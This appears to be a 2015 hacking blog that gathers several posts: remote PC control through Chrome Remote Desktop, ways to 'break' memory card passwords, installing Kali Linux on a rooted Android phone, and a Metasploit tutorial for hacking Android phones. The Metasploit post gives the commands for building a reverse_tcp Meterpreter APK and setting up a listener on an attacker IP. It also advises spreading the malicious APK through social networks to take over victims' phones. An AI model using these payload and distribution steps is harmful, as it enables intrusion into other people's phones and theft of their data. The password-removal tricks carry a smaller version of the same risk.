Sunday 23 August 2015

Control your PC with Android Mobile..

Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access
Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access



smartphone and computers let you get things done anywhere and everywhere, but portability becomes more bane than blessing when you forget a critical file at home, especially if you're the type of person who dumps files on your desktop rather than a Dropbox folder.here i am going to use Google's Chrome Remote Desktop for control your pc with the help of your android device easily.this service, first launched in 2011, is coming to mobile. But now, the company released an Android app that will let users access their desktop computers, whether through a Chrome web app for Mac, PC, and Linux or through Chrome OS itself. Once you've set up your primary machine, you can launch the Android app to connect to it. GigaOm reported a few days ago that the app was in beta testing, but it's now available to anyone with an Android phone or tablet, though doing much with the former will be a little cramped. There's no precise date given for an iOS version, but Google says it will be coming later this year.

Since releasing Chrome Remote Desktop, Google has increasingly added ways to connect desktop computers with other devices. Hangouts got a remote desktop feature in mid-2013, and the Chromecast dongle pulls Chrome tabs onto a TV with a minimum of hassle. Outside its ecosystem, other companies have offered similar apps, including Microsoft, which added native remote desktop support in Windows 8 and released apps for both iOS and Android in late 2013.

Now follow step by step full guide to control your pc or laptop using your android phone no root required.

Step:1) First of all you need to download and install chrome remote desktop .apk file in your android device or tablets ,for download it simply go to google play store in your android mobile phone and install Chrome Remote Desktop
 
"or you can download it directly using below link."

<< download link>>
 

Step:2) Now i assuming that you download and install google remote desktop from step 1, after installing when you will click on the chrome remote desktop app on your phone, it will show you a screen like the one given below.

Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access


Step:3) after step 1&2 you need to install chromo remote desktop extension ,for this simply first  go to your PC and Open Chrome Browser and click this link for install extension


Step:4) 
give permission to chrome remote desktop authorize, click "continue" button


Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access

Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access


Step:5) It will take you tochrome://chrome-signin/ page. Sign in here with the same gmail account as of your android phone.


Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access








Step:6) After clicking on that an exe file will start downloading. Install that .exe file once it gets downloaded. Continue the process.

Step:7) It will prompt you to choose a six digit PIN. This six digit PIN is the same PIN which will be required as a access key for pairing up with your PC.



Step:8) after that  go to your phone and click on chrome remote desktop again and you will find your computer there. Click on your PC icon.(see below screenshot)


Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access

Step:9) now here you need to Enter the same six digit key which you chose just before in step 7


Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access
 

that's it friends you have done !  you are now using your computer through your phone.

Note :
that You must be connected through internet in your Phone as well as your PC to do that. You can also use chrome remote desktop to connect one PC to another.

 

OVER TO YOU :


In the end, the new Chrome Remote Desktop app is a welcome addition to the Android family, delivering a truly user-friendly experience that's oh-so-rare in the world of remote desktop software. It's fast, it's easy, it's free, and you don't even need to install any additional software on your PC if you're already using Chrome. What's not to like?

Hack a memory card password within minutes

possible ways to break micro sd memory card password
Image result for memory card


hye friends today's topic is very importent .some time we secrate the data in memory card with
password but unfortunatly we forget that password which protect our dta from hackers or
your friends or any other you guess.
so i am here to give you best solution of breaking memory card paasword in only 5 minutes.
there are lot off methode publish on internate about how to break the memory card password but
many of my reader advise me to write a tutorial about breaking memory card password .becuase
they believe that i am write that tutorial very friendly so they can understand very ifficiently.
so now i am going to start the tutorial namly how to break memory card password.here i am
publish very friendly methode break password so i give only those methode which easily
understandable for everyone .so dont wasting your valuable time lets start.follow step by step
procedure.
solution no. 1:--

BREAKING MEMORY CARD PASSWORD FOR ANDROID DEVICES


1.   first of all  Go to file manager (my files)  of your android  mobile phone.

2.    after that .there are lot off your folder so going to right folder  ,in the setting  choose system folders,

3.     find a file named as mmcstore  in the system folder .

4.   simply copy that file mmcstore  and Send the file on pc or laptop with the help of data cable or Bluetooth or any other transfering software.

5. after doing step 4 ,simply Open the file  mmcstore  In notepad or any other file editore applictaion,i prefer use notepad because it is inbuilt application in your pc or laptop.

6.    now this is the time to remove the passwrd  when file mmcstore is open you will see the password located in the file.password formate like bellow given .
ie: (?!??1?2?3?4?5???)
so here is the password of your memory card is 12345
thats it you have break your memory crad password .
NOTE: this methode is not only for android phone also for those phones which give you acces to control mmcstore file in file explorer.you also bteak memorycard password in those mobile phones


solution no. 2:

in solution no. 1 i give you very simple trick to break password unfortunatly ,
if you are unable to break memory card pasword using solution no.1 ,so dont worry there is another methode to break memory card password follow step by step procedure .
break memory card  pasword using nokia E& N series mobile
1.first of all Insert memory card in any E series or N series Nokia mobile

2.after that simply  Format it

3. when you fomate your memory card you see that it will not ask you for password
4.  so after fomate memory card you see your memory card password removed.

solution no. 3:---

HOW TO BREAK MICRO SD MEMORY CARD PASSWORD FOR  NOKIA SYMBIAN MOBILES:


1.first of all  install  any file Explorer aplication in  your device it scan your device.
2. after that  open Explorer app and  press zero (0).This will allow you to see system files

3.now this time to find   MmcStorefile,which should be located in the following path
/sys/data/mmcstore

4.after that when you find that file mmcstore then copy it and open it using any editor application like notepad

5. in this file mmcstore you check the third column, the code like!VBGGSSMDGY

6. SIMPLY  delete it.and you are done  your memory crad password will be break.
 
solution no. 4:

HOW TO RECOVER MEMORY CARD PASSWORD USING  SOME SOFTWARE


(1.)Remove the memory from you android device

(2.) insert into any memory card and connect to pc or Laptop

(3.) once done and right click on device disk

(4.) then choose format from menu option.(for windows only)

(5.) Once done,you will see your memory card password has been removed/unlock

i Hope,this article will help you in restoring/remove memory card password.If you faced any issue 

with above procedure do let me know in below comments.

if you like this tutorial please share it with your friends and like this article how to remove memory

crack passwrod in simple steps.

Saturday 22 August 2015

Install Kali Linux on your Android device(rooted device)

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer 2015
 how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer
 Hello dear readers today i am coming with a great post which is all about how you can easily install Kali Linux hacking tool in your android device without any computer or laptop ,Google's Android Operating System in Mobile phones are still relatively new, however, Android Operating System has been progressing quite rapidly. Conceived as a counterpoint IOS, Android is a graph showing a significant development, it certainly can not be separated from supports major mobile phone manufacturers who participated to bring mobile-phone operating system Android.i am writing this post because similar article on the internet have some error so newbie like you are not able to install the hacker's operating system (Kali) on the android phone.After read this full tutorial you know all about How To Install & Run Kali/Ubuntu/Fedora Linux on Android .for your knowledge purpose i want to write something about Kali before start the actual tutorial , Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of Backtrack Linux, adhering completely to Debian development standards. Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
This post is mainly for those hackers out there that are familiar with Linux and that use Linux to perform security checks on things like cracking wep Wi-Fi passwords or cracking security on websites. in my previous post i explained how to hack wifi on android.This opens the door to doing this from a mobile device such as a phone or a tablet.  This process is possible because android firmware is so similar to Linux.

#SOME GREAT FEATURE OF KALI LINUX THE HACKER'S OS:



I know all of  you are familiar with hacking tools which are useful for hackers if don't know then don't worry Kali is the collection of more then 600 tools but in mobile version 300 tools are present.If i AM GOING TO tell you all feature of Kali OS then i'm foolish because there are no limit of Kali feature's but for your understanding i listed some most important feature of Kali Linux like... :)

  • FHS compliant
  • Wide-ranging wireless device support
  • Custom kernel, patched for injection
  • Developed in a secure environment
  • GPG signed packages and repositories
  • Multi-language support
  • Completely customizable
  • ARMEL and ARMHF support


#PREREQUISITES( YOU NEED TO DO BEFORE START THE TUT.)


For Installing and running Kali Linux on your Android device you need to do something which is listed below in 5 points.

  • 1. ) your android device must be Rooted ,without rooted device you can not install Kali Linux in your android .If you don't know "what is android root" and how to root your device then Refer to my previous post "


  • 2.) you need to install Busybox Installer after rooting your android device .before root the device you can not install busybox installer in your android phone.you can download busybox installer from this link <<download busybox installer >> 
 


  • 5.) if you want to work with Kali , your device must be has 4GB Free Space on your External Memory.

  • 6.) most important is your device is connected with High Speed Net .(wifi or 3G is best choice for you)

#NOW START INSTALLING KALI ON ANDROID PHONES OR TABLET:


Lets coming towards The Ultimate Installation Guide for Kali Linux.For Run Kali Linux On Your Android Device you need to Follow Some Simple Steps (i recommend understand  every step carefully ) and enjoy hacker's OS of course Kali.



STEP 1:) 
first of all you need to root your android device or tablet  as i say above in PREREQUISITES.Kindly refer my previous post given tutorial  for root your device


STEP 2:)--: Now when you root your device you need to install busybox using busybox installer. for install busybox First we need to install UNIX Scripts into our device using the Busybox Installer app. here I assume that you download busybox installer from the above given link now follow below some steps and install busybox .

  • 1.fist of all open busybox installer and here you see a window simply Choose the Busybox Version and click on it  from the drop down menu.(see below picture for clear understanding)



  • 2. here in this screen you need to press the  the install button which is given below the screen.(see screenshots)




  • 3. when you click on install button It will download the scripts to be install on your android device as you see in below given picture.(here you need high speed internet connection)





  • 4.when the UNIX script successfully installed in your android phone  you will get the success message like below one picture.


  • 5.That is friends you successfullt Now you have successfully installed busybox in your android device.


Note: If you faced problem in installing UNIX script then choose another version of busybox and apply same process 2,3,4 .Generally this error come's  because of your different android version so choose again and again till you get the success message.



STEP 3: 
Now the actual step come when we install Kali Linux on android phone  storage .this step is all about how to "Configure Linux Deploy". for your kind information Linux Deploy is the Official app to Download and install Kali Linux in android without this app you can not install Kali on your android so download this app download link is  given in the beginning of the tutorial (prerequisites)  and install it in your android. Now i assume that you download and install it in your device simply  follow the given steps carefully.

  • 1.first of all open Linux Deploy app in your android device .

  • 2.And simply Tap the properties icon it will opens the properties screen like below picture .





 

  • 3. Here in this screen you see many option simply  select the distribution to be install and select Kali Linux ( see screenshots below)





  • 4.Here i am only tell about how to install Kali not it uses so  Leave some setting to be default and select the desktop environment to GNOME.



  • 5.now one thing more Select all the components in Components Menu.



  • 6. if you want to adjust the height and width of the screen then choose GUI Settings just interchange the height and width values.( see below picture for clear understanding)



  • 7. Now don't wasting the time simply you need to select the install button and then hit  OK button .


 

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer
  • 8. when you done all above 7 point now you can see the result that is the installation process starts .

 

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer


  • 9. I cant add the screenshot of completed process because I already did it. Now tap the START button  and tap OK it will mount the Linux file.

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer 

Note:  
 Here i can only say be patient for the installation process to complete it takes too much of time to complete and prevent the incoming SMS and Voice Calls or Turn off the SIM and use WIFI to download because interruption of cellular data leads to cancellation of download process.( i recommend use wifi connection instead of Sim internet connection ) here you need very high speed internet for downloading the  all processes.

  • 10. simply Note down  the IP address in the top left corner of Linux deploy it changes periodically.


STEP 4:) --: This is  last step which we are going to perform, this step is all about Configure The Android vnc. I assuming that you download android vnc from the link which is given in the beginning of the tutorial (prerequisites) .If you think what is use of this android vnc viewer you think right ,Basically VNC is use to connect the mobile device to computer but here i am going to use this app for connect with Linux deploy by which you can install and use the Kali Linux in your android device or phone. so don't wasting time follow given process and that's it

  • first of all open the Android VNC Viewer,

  • select "new " in connection

  • after that Enter Nickname and password the default password for Kali Linux is changeme

  • and give the IP address copied from Linux deploy for me it is 192.168.1.35 and the port is 5900 and username is android and then color is 24-bit color(4bpp).

  • Finally tap the Connect button you will see the Kali Linux in your android device.

see below given  screenshots for the clear understanding of  the step 4 :

 

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer
how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer



HOW TO CLOSE THE KALI LINUX :



To close the Kali Linux, exit from the VNC viewer and then go to Linux Deploy and simply tap the Stop Button and the OK it will close the Mounted Image. You can use the Linux Penetration Testing on your android phone and it is most popular for cyber hacking.

see below screenshots which are useful to close kali linux :

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer
how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer
 

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer

OVER TO YOU:


Now this is your turn how you can use this popular operating system
 ,you are free to comment here what is your experience which you are gain during this tutorial if you faced any problem in any steps fee free drop your comment ,i will solve your problem within 2 hour .
if you like this post please don't  forget to share it with friends also please socialize it . thank you so much ,stay tune with this blog and blog's admin:-Anmol Kapoor

Wednesday 19 August 2015

Hack Android (using Metasploit)

Hacking Android Smartphone Tutorial using Metasploit

what  is   your  Requirements:

1. first  you  need Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. obiously you need  a  Android smartphone (we use LG android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

step:1). first  of  all  simply  Open terminal if  you  don't  know  how  simply  press CTRL + ALT + T

step:2). After  that  We will utilize Metasploit payload framework to create exploit for this tutorial.

    msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

here  we  allready  describe  what  is attacker   IP address  and  here  we  considered  ip  as  182.158.18.67, if  you  don't  understand  please  see beelow  picture

step:3) .This  is   Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above.simply  goto  console if  you  don't  know  how  to   go  to  consol window  simply   Type msfconsole to go to Metasploit console.


Info:
 use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

step:4) .after  doing  this   The next step we need to configure the switch for the Metasploit payload we already specified in step 3.



Info:

    set lhost 192.168.8.94 –> attacker IP address
    set lport 443 –> port to listen the reverse connection
     exploit –> start to listen incoming connection

step:5) . Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet  and  social  networking  sites   are  the good place for distribution )

step:6) . Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

step:7).what  its  mean , It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone he  can  steal  all  information  of  victim even  sometime  destroy  all  sencitive  data of  mobile


security  tips:

1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

3.always  turn  of  unknown  scource  installation  feature ,every phone  have  this  feature  in  security  tab  under  mobile  setting